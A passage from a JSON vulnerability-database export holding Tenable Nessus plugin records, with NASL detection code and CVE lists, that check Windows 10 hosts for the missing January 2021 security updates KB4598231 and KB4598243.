"CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598231.NASL", "href": "https://www.tenable.com/plugins/nessus/144873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144873);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"MSKB\", value:\"4598231\");\n script_xref(name:\"MSFT\", value:\"MS21-4598231\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598231: Windows 10 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598231/windows-10-update-kb4598231\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a8452c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598231'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598231])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-02T20:36:16", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1671", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598243.NASL", "href": "https://www.tenable.com/plugins/nessus/144882", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144882);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598243\");\n script_xref(name:\"MSFT\", value:\"MS21-4598243\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, 